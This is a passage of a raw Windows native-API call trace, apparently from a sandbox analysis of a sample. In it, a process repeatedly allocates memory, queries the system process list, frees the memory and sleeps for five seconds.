AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0216.237] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0216.833] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0216.834] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0217.231] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0217.231] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0217.232] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0217.233] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0217.233] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0217.992] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.998] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0218.058] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0218.059] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0218.095] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0218.098] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0218.099] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0218.376] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.377] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0218.394] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0218.395] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0218.403] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0218.403] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0218.403] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0218.661] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.662] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0218.671] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0218.671] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0218.673] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0218.673] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0218.673] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0218.895] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.896] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0218.911] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0218.912] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0218.918] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0218.918] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0218.918] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0219.147] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.148] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0219.154] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0219.154] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0219.155] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0219.156] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0219.156] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0219.702] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.710] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0219.720] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0219.721] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0219.730] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0219.730] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0219.731] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0219.985] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.986] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0219.996] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0219.997] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0220.038] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0220.038] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0220.038] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0220.381] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.383] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0220.393] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0220.414] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0220.417] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0220.417] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0220.417] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0220.710] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.711] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0220.724] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0220.724] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0220.726] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0220.726] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0220.726] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0221.371] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.373] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0221.535] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0221.536] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0221.548] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0221.548] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0221.548] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0222.285] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.287] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0222.357] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0222.358] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0222.493] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0222.493] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0222.494] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0222.787] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.788] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0222.795] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0222.796] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0222.799] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0222.799] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0222.800] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0223.103] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.104] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0223.110] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0223.110] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0223.113] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0223.113] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0223.114] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0223.347] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.348] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0223.364] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0223.366] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0223.371] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0223.375] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0223.375] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0223.554] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.555] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0223.559] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0223.560] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0223.561] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0223.561] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0223.561] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0223.707] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.708] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0223.714] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0223.714] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0223.717] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0223.717] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0223.718] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0224.209] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.210] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0224.214] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0224.214] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0224.215] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0224.215] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0224.215] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0224.465] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.467] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0224.474] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0224.478] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0224.480] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0224.480] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0224.481] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0224.684] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.685] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0224.697] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0224.698] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0224.699] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0224.699] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0224.699] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0224.967] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.968] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0225.053] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0225.053] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0225.054] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0225.055] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0225.055] NtQuerySystemInformation (in: 